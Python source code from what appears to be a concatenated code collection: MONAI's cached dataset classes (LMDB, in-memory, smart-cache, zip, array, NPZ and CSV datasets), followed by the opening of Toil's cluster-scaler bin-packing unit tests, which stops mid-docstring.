if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for i, _transform in enumerate(self.transform.transforms):
if i >= self.cache_n_trans:
item_transformed = apply_transform(_transform, item_transformed)
return item_transformed
class LMDBDataset(PersistentDataset):
"""
Extension of `PersistentDataset` using LMDB as the backend.
See Also:
:py:class:`monai.data.PersistentDataset`
Examples:
>>> items = [{"data": i} for i in range(5)]
# [{'data': 0}, {'data': 1}, {'data': 2}, {'data': 3}, {'data': 4}]
>>> lmdb_ds = monai.data.LMDBDataset(items, transform=monai.transforms.SimulateDelayd("data", delay_time=1))
>>> print(list(lmdb_ds)) # using the cached results
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_dir: Union[Path, str] = "cache",
hash_func: Callable[..., bytes] = pickle_hashing,
db_name: str = "monai_cache",
progress: bool = True,
pickle_protocol=pickle.HIGHEST_PROTOCOL,
lmdb_kwargs: Optional[dict] = None,
) -> None:
"""
Args:
data: input data file paths to load and transform to generate dataset for model.
`LMDBDataset` expects input data to be a list of serializable
and hashes them as cache keys using `hash_func`.
transform: transforms to execute operations on input data.
cache_dir: if specified, this is the location for persistent storage
of pre-computed transformed data tensors. The cache_dir is computed once, and
persists on disk until explicitly removed. Different runs, programs, experiments
may share a common cache dir provided that the transforms pre-processing is consistent.
If the cache_dir doesn't exist, will automatically create it. Defaults to "./cache".
hash_func: a callable to compute hash from data items to be cached.
defaults to `monai.data.utils.pickle_hashing`.
db_name: lmdb database file name. Defaults to "monai_cache".
progress: whether to display a progress bar.
pickle_protocol: pickle protocol version. Defaults to pickle.HIGHEST_PROTOCOL.
https://docs.python.org/3/library/pickle.html#pickle-protocols
lmdb_kwargs: additional keyword arguments to the lmdb environment.
for more details please visit: https://lmdb.readthedocs.io/en/release/#environment-class
"""
super().__init__(data=data, transform=transform, cache_dir=cache_dir, hash_func=hash_func)
self.progress = progress
if not self.cache_dir:
raise ValueError("cache_dir must be specified.")
self.db_file = self.cache_dir / f"{db_name}.lmdb"
self.pickle_protocol = pickle_protocol
self.lmdb_kwargs = lmdb_kwargs or {}
if not self.lmdb_kwargs.get("map_size", 0):
self.lmdb_kwargs["map_size"] = 1024 ** 4 # default map_size
# lmdb is single-writer multi-reader by default
# the cache is created without multi-threading
self._read_env = None
# this runs on the primary thread/process
self._fill_cache_start_reader(show_progress=self.progress)
print(f"Accessing lmdb file: {self.db_file.absolute()}.")
def set_data(self, data: Sequence):
"""
Set the input data and delete all the out-dated cache content.
"""
super().set_data(data=data)
self._read_env = self._fill_cache_start_reader(show_progress=self.progress)
def _fill_cache_start_reader(self, show_progress=True):
"""
Check the LMDB cache and write the cache if needed. py-lmdb doesn't have a good support for concurrent write.
This method can be used with multiple processes, but it may have a negative impact on the performance.
Args:
show_progress: whether to show the progress bar if possible.
"""
# create cache
self.lmdb_kwargs["readonly"] = False
env = lmdb.open(path=f"{self.db_file}", subdir=False, **self.lmdb_kwargs)
if show_progress and not has_tqdm:
warnings.warn("LMDBDataset: tqdm is not installed. not displaying the caching progress.")
with env.begin(write=False) as search_txn:
for item in tqdm(self.data) if has_tqdm and show_progress else self.data:
key = self.hash_func(item)
done, retry, val = False, 5, None
while not done and retry > 0:
try:
with search_txn.cursor() as cursor:
done = cursor.set_key(key)
if done:
continue
if val is None:
val = self._pre_transform(deepcopy(item)) # keep the original hashed
val = pickle.dumps(val, protocol=self.pickle_protocol)
with env.begin(write=True) as txn:
txn.put(key, val)
done = True
except lmdb.MapFullError:
done, retry = False, retry - 1
size = env.info()["map_size"]
new_size = size * 2
warnings.warn(
f"Resizing the cache database from {int(size) >> 20}MB" f" to {int(new_size) >> 20}MB."
)
env.set_mapsize(new_size)
except lmdb.MapResizedError:
# the mapsize is increased by another process
# set_mapsize with a size of 0 to adopt the new size
env.set_mapsize(0)
if not done: # still has the map full error
size = env.info()["map_size"]
env.close()
raise ValueError(f"LMDB map size reached, increase size above current size of {size}.")
size = env.info()["map_size"]
env.close()
# read-only database env
self.lmdb_kwargs["readonly"] = True
self.lmdb_kwargs["map_size"] = size
if self.lmdb_kwargs.get("lock", None) is None:
self.lmdb_kwargs["lock"] = False
if self.lmdb_kwargs.get("readahead", None) is None:
self.lmdb_kwargs["readahead"] = False
return lmdb.open(path=f"{self.db_file}", subdir=False, **self.lmdb_kwargs)
def _cachecheck(self, item_transformed):
"""
if the item is not found in the lmdb file, resolves to the persistent cache default behaviour.
"""
if self._read_env is None:
# this runs on multiple processes, each one should have its own env.
self._read_env = self._fill_cache_start_reader(show_progress=False)
with self._read_env.begin(write=False) as txn:
data = txn.get(self.hash_func(item_transformed))
if data is None:
warnings.warn("LMDBDataset: cache key not found, running fallback caching.")
return super()._cachecheck(item_transformed)
try:
return pickle.loads(data)
except Exception as err:
raise RuntimeError("Invalid cache value, corrupted lmdb file?") from err
def info(self):
"""
Returns: dataset info dictionary.
"""
if self._read_env is None:
self._read_env = self._fill_cache_start_reader()
out = dict(self._read_env.info())
out["size"] = len(self.data)
out["filename"] = f"{self.db_file.absolute()}"
return out
class CacheDataset(Dataset):
"""
Dataset with cache mechanism that can load data and cache deterministic transforms' result during training.
By caching the results of non-random preprocessing transforms, it accelerates the training data pipeline.
If the requested data is not in the cache, all transforms will run normally
(see also :py:class:`monai.data.dataset.Dataset`).
Users can set the cache rate or number of items to cache.
It is recommended to experiment with different `cache_num` or `cache_rate` to identify the best training speed.
The transforms which are supposed to be cached must implement the `monai.transforms.Transform`
interface and should not be `Randomizable`. This dataset will cache the outcomes before the first
`Randomizable` `Transform` within a `Compose` instance.
So to improve the caching efficiency, please always put as many as possible non-random transforms
before the randomized ones when composing the chain of transforms.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
For example, if the transform is a `Compose` of::
transforms = Compose([
LoadImaged(),
AddChanneld(),
Spacingd(),
Orientationd(),
ScaleIntensityRanged(),
RandCropByPosNegLabeld(),
ToTensord()
])
when `transforms` is used in a multi-epoch training pipeline, before the first training epoch,
this dataset will cache the results up to ``ScaleIntensityRanged``, as
all non-random transforms `LoadImaged`, `AddChanneld`, `Spacingd`, `Orientationd`, `ScaleIntensityRanged`
can be cached. During training, the dataset will load the cached results and run
``RandCropByPosNegLabeld`` and ``ToTensord``, as ``RandCropByPosNegLabeld`` is a randomized transform
and the outcome not cached.
During training call `set_data()` to update input data and recompute cache content, note that it requires
`persistent_workers=False` in the PyTorch DataLoader.
Note:
`CacheDataset` executes non-random transforms and prepares cache content in the main process before
the first epoch, then all the subprocesses of DataLoader will read the same cache content in the main process
during training. it may take a long time to prepare cache content according to the size of expected cache data.
So to debug or verify the program before real training, users can set `cache_rate=0.0` or `cache_num=0` to
temporarily skip caching.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_num: int = sys.maxsize,
cache_rate: float = 1.0,
num_workers: Optional[int] = None,
progress: bool = True,
) -> None:
"""
Args:
data: input data to load and transform to generate dataset for model.
transform: transforms to execute operations on input data.
cache_num: number of items to be cached. Default is `sys.maxsize`.
will take the minimum of (cache_num, data_length x cache_rate, data_length).
cache_rate: percentage of cached data in total, default is 1.0 (cache all).
will take the minimum of (cache_num, data_length x cache_rate, data_length).
num_workers: the number of worker processes to use.
If num_workers is None then the number returned by os.cpu_count() is used.
progress: whether to display a progress bar.
"""
if not isinstance(transform, Compose):
transform = Compose(transform)
super().__init__(data=data, transform=transform)
self.progress = progress
self.cache_num = min(int(cache_num), int(len(data) * cache_rate), len(data))
self.num_workers = num_workers
if self.num_workers is not None:
self.num_workers = max(int(self.num_workers), 1)
self._cache: List = self._fill_cache()
def set_data(self, data: Sequence):
"""
Set the input data and run deterministic transforms to generate cache content.
Note: should call this func after an entire epoch and must set `persistent_workers=False`
in PyTorch DataLoader, because it needs to create new worker processes based on new
generated cache content.
"""
self.data = data
self._cache = self._fill_cache()
def _fill_cache(self) -> List:
if self.cache_num <= 0:
return []
if self.progress and not has_tqdm:
warnings.warn("tqdm is not installed, will not show the caching progress bar.")
with ThreadPool(self.num_workers) as p:
if self.progress and has_tqdm:
return list(
tqdm(
p.imap(self._load_cache_item, range(self.cache_num)),
total=self.cache_num,
desc="Loading dataset",
)
)
return list(p.imap(self._load_cache_item, range(self.cache_num)))
def _load_cache_item(self, idx: int):
"""
Args:
idx: the index of the input data sequence.
"""
item = self.data[idx]
for _transform in self.transform.transforms: # type:ignore
# execute all the deterministic transforms
if isinstance(_transform, Randomizable) or not isinstance(_transform, Transform):
break
_xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform
item = apply_transform(_xform, item)
return item
def _transform(self, index: int):
if index % len(self) >= self.cache_num: # support negative index
# no cache for this index, execute all the transforms directly
return super()._transform(index)
# load data from cache and execute from the first random transform
start_run = False
if self._cache is None:
self._cache = self._fill_cache()
data = self._cache[index]
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for _transform in self.transform.transforms:
if start_run or isinstance(_transform, Randomizable) or not isinstance(_transform, Transform):
# only need to deep copy data on first non-deterministic transform
if not start_run:
start_run = True
data = deepcopy(data)
data = apply_transform(_transform, data)
return data
class SmartCacheDataset(Randomizable, CacheDataset):
"""
Re-implementation of the SmartCache mechanism in NVIDIA Clara-train SDK.
At any time, the cache pool only keeps a subset of the whole dataset. In each epoch, only the items
in the cache are used for training. This ensures that data needed for training is readily available,
keeping GPU resources busy. Note that cached items may still have to go through a non-deterministic
transform sequence before being fed to GPU. At the same time, another thread is preparing replacement
items by applying the transform sequence to items not in cache. Once one epoch is completed, Smart
Cache replaces the same number of items with replacement items.
Smart Cache uses a simple `running window` algorithm to determine the cache content and replacement items.
Let N be the configured number of objects in cache; and R be the number of replacement objects (R = ceil(N * r),
where r is the configured replace rate).
For more details, please refer to:
https://docs.nvidia.com/clara/tlt-mi/clara-train-sdk-v3.0/nvmidl/additional_features/smart_cache.html#smart-cache
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
For example, if we have 5 images: `[image1, image2, image3, image4, image5]`, and `cache_num=4`, `replace_rate=0.25`.
so the actual training images cached and replaced for every epoch are as below::
epoch 1: [image1, image2, image3, image4]
epoch 2: [image2, image3, image4, image5]
epoch 3: [image3, image4, image5, image1]
epoch 3: [image4, image5, image1, image2]
epoch N: [image[N % 5] ...]
The usage of `SmartCacheDataset` contains 4 steps:
1. Initialize `SmartCacheDataset` object and cache for the first epoch.
2. Call `start()` to run replacement thread in background.
3. Call `update_cache()` before every epoch to replace training items.
4. Call `shutdown()` when training ends.
During training call `set_data()` to update input data and recompute cache content, note to call
`shutdown()` to stop first, then update data and call `start()` to restart.
Note:
This replacement will not work for below cases:
1. Set the `multiprocessing_context` of DataLoader to `spawn`.
2. Run on windows(the default multiprocessing method is `spawn`) with `num_workers` greater than 0.
3. Set the `persistent_workers` of DataLoader to `True` with `num_workers` greater than 0.
If using MONAI workflows, please add `SmartCacheHandler` to the handler list of trainer,
otherwise, please make sure to call `start()`, `update_cache()`, `shutdown()` during training.
Args:
data: input data to load and transform to generate dataset for model.
transform: transforms to execute operations on input data.
replace_rate: percentage of the cached items to be replaced in every epoch.
cache_num: number of items to be cached. Default is `sys.maxsize`.
will take the minimum of (cache_num, data_length x cache_rate, data_length).
cache_rate: percentage of cached data in total, default is 1.0 (cache all).
will take the minimum of (cache_num, data_length x cache_rate, data_length).
num_init_workers: the number of worker threads to initialize the cache for first epoch.
If num_init_workers is None then the number returned by os.cpu_count() is used.
num_replace_workers: the number of worker threads to prepare the replacement cache for every epoch.
If num_replace_workers is None then the number returned by os.cpu_count() is used.
progress: whether to display a progress bar when caching for the first epoch.
shuffle: whether to shuffle the whole data list before preparing the cache content for first epoch.
it will not modify the original input data sequence in-place.
seed: random seed if shuffle is `True`, default to `0`.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
replace_rate: float,
cache_num: int = sys.maxsize,
cache_rate: float = 1.0,
num_init_workers: Optional[int] = None,
num_replace_workers: Optional[int] = None,
progress: bool = True,
shuffle: bool = True,
seed: int = 0,
) -> None:
if shuffle:
self.set_random_state(seed=seed)
data = copy(data)
self.randomize(data)
self.shuffle = shuffle
super().__init__(data, transform, cache_num, cache_rate, num_init_workers, progress)
if self._cache is None:
self._cache = self._fill_cache()
if self.cache_num >= len(data):
warnings.warn(
"cache_num is greater or equal than dataset length, fall back to regular monai.data.CacheDataset."
)
if replace_rate <= 0:
raise ValueError("replace_rate must be greater than 0, otherwise, please use monai.data.CacheDataset.")
self.num_replace_workers: Optional[int] = num_replace_workers
if self.num_replace_workers is not None:
self.num_replace_workers = max(int(self.num_replace_workers), 1)
self._total_num: int = len(data)
self._replace_num: int = min(math.ceil(self.cache_num * replace_rate), len(data) - self.cache_num)
self._replacements: List[Any] = [None for _ in range(self._replace_num)]
self._replace_data_idx: List[int] = list(range(self._replace_num))
self._start_pos: int = 0
self._update_lock: threading.Lock = threading.Lock()
self._round: int = 1
self._replace_done: bool = False
self._replace_mgr: Optional[threading.Thread] = None
self._compute_data_idx()
def set_data(self, data: Sequence):
"""
Set the input data and run deterministic transforms to generate cache content.
Note: should call `shutdown()` before calling this func.
"""
if self.is_started():
warnings.warn("SmartCacheDataset is not shutdown yet, shutdown it directly.")
self.shutdown()
if self.shuffle:
data = copy(data)
self.randomize(data)
super().set_data(data)
def randomize(self, data: Sequence) -> None:
try:
self.R.shuffle(data)
except TypeError as e:
warnings.warn(f"input data can't be shuffled in SmartCacheDataset with numpy.random.shuffle(): {e}.")
def _compute_data_idx(self):
"""
Update the replacement data position in the total data.
"""
for i in range(self._replace_num):
pos: int = self._start_pos + self.cache_num + i
if pos >= self._total_num:
pos -= self._total_num
self._replace_data_idx[i] = pos
def is_started(self):
"""
Check whether the replacement thread is already started.
"""
if self._replace_mgr is None:
return False
return self._replace_mgr.is_alive()
def start(self):
"""
Start the background thread to replace training items for every epoch.
"""
if self._replace_mgr is None or not self.is_started():
self._restart()
def _restart(self):
"""
Restart background thread if killed for some reason.
"""
self._round = 1
self._replace_mgr = threading.Thread(target=self.manage_replacement, daemon=True)
self._replace_mgr.start()
def _try_update_cache(self):
"""
Update the cache items with new replacement for current epoch.
"""
with self._update_lock:
if not self._replace_done:
return False
del self._cache[: self._replace_num]
self._cache.extend(self._replacements)
self._start_pos += self._replace_num
if self._start_pos >= self._total_num:
self._start_pos -= self._total_num
self._compute_data_idx()
# ready for next round
self._round += 1
self._replace_done = False
return True
def update_cache(self):
"""
Update cache items for current epoch, need to call this function before every epoch.
If the cache has been shutdown before, need to restart the `_replace_mgr` thread.
"""
if not self._replace_mgr.is_alive():
self._restart()
# make sure update is done
while not self._try_update_cache():
time.sleep(0.01)
def _try_shutdown(self):
"""
Wait for thread lock to shut down the background thread.
"""
with self._update_lock:
if self._replace_done:
self._round = 0
self._start_pos = 0
self._compute_data_idx()
self._replace_done = False
return True
return False
def shutdown(self):
"""
Shut down the background thread for replacement.
"""
if not self.is_started():
return
# wait until replace mgr is done the current round
while not self._try_shutdown():
time.sleep(0.01)
self._replace_mgr.join()
def _replace_cache_thread(self, index: int):
"""
Execute deterministic transforms on the new data for replacement.
"""
pos: int = self._replace_data_idx[index]
self._replacements[index] = self._load_cache_item(pos)
def _compute_replacements(self):
"""
Compute expected items for the replacement of next epoch, execute deterministic transforms.
It can support multi-threads to accelerate the computation progress.
"""
with ThreadPool(self.num_replace_workers) as p:
p.map(self._replace_cache_thread, list(range(self._replace_num)))
self._replace_done = True
def _try_manage_replacement(self, check_round):
"""
Wait thread lock and replace training items in the background thread.
"""
with self._update_lock:
if self._round <= 0:
# shutdown replacement
self._replace_done = True
return True, -1
if self._round != check_round:
self._compute_replacements()
return False, self._round
def manage_replacement(self):
"""
Background thread for replacement.
"""
check_round: int = -1
done = False
while not done:
done, check_round = self._try_manage_replacement(check_round)
time.sleep(0.01)
def __len__(self):
"""
The dataset length is given by cache_num instead of len(data).
"""
return self.cache_num
class ZipDataset(Dataset):
"""
Zip several PyTorch datasets and output data(with the same index) together in a tuple.
If the output of single dataset is already a tuple, flatten it and extend to the result.
For example: if datasetA returns (img, imgmeta), datasetB returns (seg, segmeta),
finally return (img, imgmeta, seg, segmeta).
And if the datasets don't have same length, use the minimum length of them as the length
of ZipDataset.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
Examples::
>>> zip_data = ZipDataset([[1, 2, 3], [4, 5]])
>>> print(len(zip_data))
2
>>> for item in zip_data:
>>> print(item)
[1, 4]
[2, 5]
"""
def __init__(self, datasets: Sequence, transform: Optional[Callable] = None) -> None:
"""
Args:
datasets: list of datasets to zip together.
transform: a callable data transform operates on the zipped item from `datasets`.
"""
super().__init__(list(datasets), transform=transform)
def __len__(self) -> int:
return min((len(dataset) for dataset in self.data))
def _transform(self, index: int):
def to_list(x):
return list(x) if isinstance(x, (tuple, list)) else [x]
data = []
for dataset in self.data:
data.extend(to_list(dataset[index]))
if self.transform is not None:
data = apply_transform(self.transform, data, map_items=False) # transform the list data
# use tuple instead of list as the default collate_fn callback of MONAI DataLoader flattens nested lists
return tuple(data)
class ArrayDataset(Randomizable, _TorchDataset):
"""
Dataset for segmentation and classification tasks based on array format input data and transforms.
It ensures the same random seeds in the randomized transforms defined for image, segmentation and label.
The `transform` can be :py:class:`monai.transforms.Compose` or any other callable object.
For example:
If train based on Nifti format images without metadata, all transforms can be composed::
img_transform = Compose(
[
LoadImage(image_only=True),
AddChannel(),
RandAdjustContrast()
]
)
ArrayDataset(img_file_list, img_transform=img_transform)
If training based on images and the metadata, the array transforms can not be composed
because several transforms receives multiple parameters or return multiple values. Then Users need
to define their own callable method to parse metadata from `LoadImage` or set `affine` matrix
to `Spacing` transform::
class TestCompose(Compose):
def __call__(self, input_):
img, metadata = self.transforms[0](input_)
img = self.transforms[1](img)
img, _, _ = self.transforms[2](img, metadata["affine"])
return self.transforms[3](img), metadata
img_transform = TestCompose(
[
LoadImage(image_only=False),
AddChannel(),
Spacing(pixdim=(1.5, 1.5, 3.0)),
RandAdjustContrast()
]
)
ArrayDataset(img_file_list, img_transform=img_transform)
Examples::
>>> ds = ArrayDataset([1, 2, 3, 4], lambda x: x + 0.1)
>>> print(ds[0])
1.1
>>> ds = ArrayDataset(img=[1, 2, 3, 4], seg=[5, 6, 7, 8])
>>> print(ds[0])
[1, 5]
"""
def __init__(
self,
img: Sequence,
img_transform: Optional[Callable] = None,
seg: Optional[Sequence] = None,
seg_transform: Optional[Callable] = None,
labels: Optional[Sequence] = None,
label_transform: Optional[Callable] = None,
) -> None:
"""
Initializes the dataset with the filename lists. The transform `img_transform` is applied
to the images and `seg_transform` to the segmentations.
Args:
img: sequence of images.
img_transform: transform to apply to each element in `img`.
seg: sequence of segmentations.
seg_transform: transform to apply to each element in `seg`.
labels: sequence of labels.
label_transform: transform to apply to each element in `labels`.
"""
items = [(img, img_transform), (seg, seg_transform), (labels, label_transform)]
self.set_random_state(seed=get_seed())
datasets = [Dataset(x[0], x[1]) for x in items if x[0] is not None]
self.dataset = datasets[0] if len(datasets) == 1 else ZipDataset(datasets)
self._seed = 0 # transform synchronization seed
def __len__(self) -> int:
return len(self.dataset)
def randomize(self, data: Optional[Any] = None) -> None:
self._seed = self.R.randint(MAX_SEED, dtype="uint32")
def __getitem__(self, index: int):
self.randomize()
if isinstance(self.dataset, ZipDataset):
# set transforms of each zip component
for dataset in self.dataset.data:
transform = getattr(dataset, "transform", None)
if isinstance(transform, Randomizable):
transform.set_random_state(seed=self._seed)
transform = getattr(self.dataset, "transform", None)
if isinstance(transform, Randomizable):
transform.set_random_state(seed=self._seed)
return self.dataset[index]
class NPZDictItemDataset(Dataset):
"""
Represents a dataset from a loaded NPZ file. The members of the file to load are named in the keys of `keys` and
stored under the keyed name. All loaded arrays must have the same 0-dimension (batch) size. Items are always dicts
mapping names to an item extracted from the loaded arrays.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
Args:
npzfile: Path to .npz file or stream containing .npz file data
keys: Maps keys to load from file to name to store in dataset
transform: Transform to apply to batch dict
other_keys: secondary data to load from file and store in dict `other_keys`, not returned by __getitem__
"""
def __init__(
self,
npzfile: Union[str, IO],
keys: Dict[str, str],
transform: Optional[Callable[..., Dict[str, Any]]] = None,
other_keys: Optional[Sequence[str]] = (),
):
self.npzfile: Union[str, IO] = npzfile if isinstance(npzfile, str) else "STREAM"
self.keys: Dict[str, str] = dict(keys)
dat = np.load(npzfile)
self.arrays = {storedk: dat[datak] for datak, storedk in self.keys.items()}
self.length = self.arrays[first(self.keys.values())].shape[0]
self.other_keys = {} if other_keys is None else {k: dat[k] for k in other_keys}
for k, v in self.arrays.items():
if v.shape[0] != self.length:
raise ValueError(
"All loaded arrays must have the same first dimension "
f"size {self.length}, array `{k}` has size {v.shape[0]}"
)
super().__init__([], transform)
def __len__(self):
return self.length
def _transform(self, index: int):
data = {k: v[index] for k, v in self.arrays.items()}
if not self.transform:
return data
result = apply_transform(self.transform, data)
if isinstance(result, dict) or (isinstance(result, list) and isinstance(result[0], dict)):
return result
raise AssertionError("With a dict supplied to apply_transform, should return a dict or a list of dicts.")
class CSVDataset(Dataset):
"""
Dataset to load data from CSV files and generate a list of dictionaries,
every dictionary maps to a row of the CSV file, and the keys of dictionary
map to the column names of the CSV file.
It can load multiple CSV files and join the tables with additional `kwargs` arg.
Support to only load specific rows and columns.
And it can also group several loaded columns to generate a new column, for example,
set `col_groups={"meta": ["meta_0", "meta_1", "meta_2"]}`, output can be::
[
{"image": "./image0.nii", "meta_0": 11, "meta_1": 12, "meta_2": 13, "meta": [11, 12, 13]},
{"image": "./image1.nii", "meta_0": 21, "meta_1": 22, "meta_2": 23, "meta": [21, 22, 23]},
]
Args:
filename: the filename of expected CSV file to load. if providing a list
of filenames, it will load all the files and join tables.
row_indices: indices of the expected rows to load. it should be a list,
every item can be a int number or a range `[start, end)` for the indices.
for example: `row_indices=[[0, 100], 200, 201, 202, 300]`. if None,
load all the rows in the file.
col_names: names of the expected columns to load. if None, load all the columns.
col_types: `type` and `default value` to convert the loaded columns, if None, use original data.
it should be a dictionary, every item maps to an expected column, the `key` is the column
name and the `value` is None or a dictionary to define the default value and data type.
the supported keys in dictionary are: ["type", "default"]. for example::
col_types = {
"subject_id": {"type": str},
"label": {"type": int, "default": 0},
"ehr_0": {"type": float, "default": 0.0},
"ehr_1": {"type": float, "default": 0.0},
"image": {"type": str, "default": None},
}
col_groups: args to group the loaded columns to generate a new column,
it should be a dictionary, every item maps to a group, the `key` will
be the new column name, the `value` is the names of columns to combine. for example:
`col_groups={"ehr": [f"ehr_{i}" for i in range(10)], "meta": ["meta_1", "meta_2"]}`
transform: transform to apply on the loaded items of a dictionary data.
kwargs: additional arguments for `pandas.merge()` API to join tables.
"""
def __init__(
self,
filename: Union[str, Sequence[str]],
row_indices: Optional[Sequence[Union[int, str]]] = None,
col_names: Optional[Sequence[str]] = None,
col_types: Optional[Dict[str, Optional[Dict[str, Any]]]] = None,
col_groups: Optional[Dict[str, Sequence[str]]] = None,
transform: Optional[Callable] = None,
**kwargs,
):
files = ensure_tuple(filename)
dfs = [pd.read_csv(f) for f in files]
data = convert_tables_to_dicts(
dfs=dfs,
row_indices=row_indices,
col_names=col_names,
col_types=col_types,
col_groups=col_groups,
**kwargs,
)
super().__init__(data=data, transform=transform)
|
clusterScalerTest.py
|
# Copyright (C) 2015-2018 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from builtins import map
from builtins import object
from builtins import range
from past.utils import old_div
import time
import datetime
from contextlib import contextmanager
from threading import Thread, Event
import logging
import random
import types
import uuid
from collections import defaultdict
from mock import MagicMock
# Python 3 compatibility imports
from six.moves.queue import Empty, Queue
from six import iteritems
from toil.job import Job, JobDescription
from toil.lib.humanize import human2bytes as h2b
from toil.test import ToilTest, slow, travis_test
from toil.batchSystems.abstractBatchSystem import (AbstractScalableBatchSystem,
NodeInfo,
AbstractBatchSystem)
from toil.provisioners.node import Node
from toil.provisioners.abstractProvisioner import AbstractProvisioner, Shape
from toil.provisioners.clusterScaler import (ClusterScaler,
ScalerThread,
BinPackedFit,
NodeReservation)
from toil.common import Config, defaultTargetTime
logger = logging.getLogger(__name__)
# simplified c4.8xlarge (preemptable)
c4_8xlarge_preemptable = Shape(wallTime=3600,
memory=h2b('60G'),
cores=36,
disk=h2b('100G'),
preemptable=True)
# simplified c4.8xlarge (non-preemptable)
c4_8xlarge = Shape(wallTime=3600,
memory=h2b('60G'),
cores=36,
disk=h2b('100G'),
preemptable=False)
# simplified r3.8xlarge (non-preemptable)
r3_8xlarge = Shape(wallTime=3600,
memory=h2b('260G'),
cores=32,
disk=h2b('600G'),
preemptable=False)
# simplified t2.micro (non-preemptable)
t2_micro = Shape(wallTime=3600,
memory=h2b('1G'),
cores=1,
disk=h2b('8G'),
preemptable=False)
class BinPackingTest(ToilTest):
def setUp(self):
self.nodeShapes = [c4_8xlarge_preemptable, r3_8xlarge]
self.bpf = BinPackedFit(self.nodeShapes)
@travis_test
def testPackingOneShape(self):
"""Pack one shape and check that the resulting reservations look sane."""
self.bpf.nodeReservations[c4_8xlarge_preemptable] = [NodeReservation(c4_8xlarge_preemptable)]
self.bpf.addJobShape(Shape(wallTime=1000,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=True))
self.assertEqual(self.bpf.nodeReservations[r3_8xlarge], [])
self.assertEqual([x.shapes() for x in self.bpf.nodeReservations[c4_8xlarge_preemptable]],
[[Shape(wallTime=1000,
memory=h2b('59G'),
cores=34,
disk=h2b('98G'),
preemptable=True),
Shape(wallTime=2600,
memory=h2b('60G'),
cores=36,
disk=h2b('100G'),
preemptable=True)]])
@travis_test
def testSorting(self):
"""
Test that sorting is correct: preemptable, then memory, then cores, then disk,
then wallTime.
"""
shapeList = [c4_8xlarge_preemptable, r3_8xlarge, c4_8xlarge, c4_8xlarge,
t2_micro, t2_micro, c4_8xlarge, r3_8xlarge, r3_8xlarge, t2_micro]
shapeList.sort()
assert shapeList == [c4_8xlarge_preemptable,
t2_micro, t2_micro, t2_micro,
c4_8xlarge, c4_8xlarge, c4_8xlarge,
r3_8xlarge, r3_8xlarge, r3_8xlarge]
@travis_test
def testAddingInitialNode(self):
"""Pack one shape when no nodes are available and confirm that we fit one node properly."""
self.bpf.addJobShape(Shape(wallTime=1000,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=True))
self.assertEqual([x.shapes() for x in self.bpf.nodeReservations[c4_8xlarge_preemptable]],
[[Shape(wallTime=1000,
memory=h2b('59G'),
cores=34,
disk=h2b('98G'),
preemptable=True),
Shape(wallTime=2600,
memory=h2b('60G'),
cores=36,
disk=h2b('100G'),
preemptable=True)]])
@travis_test
def testLowTargetTime(self):
"""
Test that a low targetTime (0) parallelizes jobs aggressively (1000 queued jobs require
1000 nodes).
Ideally, low targetTime means: Start quickly and maximize parallelization after the
cpu/disk/mem have been packed.
Disk/cpu/mem packing is prioritized first, so we set job resource reqs so that each
t2.micro (1 cpu/8G disk/1G RAM) can only run one job at a time with its resources.
Each job is parametrized to take 300 seconds, so (the minimum of) 1 of them should fit into
each node's 0 second window, so we expect 1000 nodes.
"""
allocation = self.run1000JobsOnMicros(jobCores=1,
jobMem=h2b('1G'),
jobDisk=h2b('1G'),
jobTime=300,
globalTargetTime=0)
self.assertEqual(allocation, {t2_micro: 1000})
@travis_test
def testHighTargetTime(self):
"""
Test that a high targetTime (3600 seconds) maximizes packing within the targetTime.
Ideally, high targetTime means: Maximize packing within the targetTime after the
cpu/disk/mem have been packed.
Disk/cpu/mem packing is prioritized first, so we set job resource reqs so that each
t2.micro (1 cpu/8G disk/1G RAM) can only run one job at a time with its resources.
Each job is parametrized to take 300 seconds, so 12 of them should fit into each node's
3600 second window. 1000/12 = 83.33, so we expect 84 nodes.
"""
allocation = self.run1000JobsOnMicros(jobCores=1,
jobMem=h2b('1G'),
jobDisk=h2b('1G'),
jobTime=300,
globalTargetTime=3600)
self.assertEqual(allocation, {t2_micro: 84})
@travis_test
def testZeroResourceJobs(self):
"""
Test that jobs requiring zero cpu/disk/mem pack first, regardless of targetTime.
Disk/cpu/mem packing is prioritized first, so we set job resource reqs so that each
t2.micro (1 cpu/8G disk/1G RAM) can run a seemingly infinite number of jobs with its
resources.
Since all jobs should pack cpu/disk/mem-wise on a t2.micro, we expect only one t2.micro to
be provisioned. If we raise this, as in testLowTargetTime, it will launch 1000 t2.micros.
"""
allocation = self.run1000JobsOnMicros(jobCores=0,
jobMem=0,
jobDisk=0,
jobTime=300,
globalTargetTime=0)
self.assertEqual(allocation, {t2_micro: 1})
@travis_test
def testLongRunningJobs(self):
"""
Test that jobs with long run times (especially service jobs) are aggressively parallelized.
This is important, because services are one case where the degree of parallelization
really, really matters. If you have multiple services, they may all need to be running
simultaneously before any real work can be done.
Despite setting globalTargetTime=3600, this should launch 1000 t2.micros because each job's
estimated runtime (30000 seconds) extends well beyond 3600 seconds.
